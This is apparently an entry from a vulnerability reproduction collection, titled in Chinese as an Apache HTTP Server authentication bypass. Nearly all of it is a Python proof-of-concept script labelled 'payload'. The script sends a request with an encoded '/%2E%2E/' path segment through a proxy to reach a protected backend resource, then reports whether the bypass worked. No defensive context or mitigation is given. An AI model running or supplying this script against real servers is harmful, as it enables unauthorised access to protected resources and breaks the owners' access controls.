A41-1Apache-HTTPServer-身份验证绕过

漏洞复现：

payload：

import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)

        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)

        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()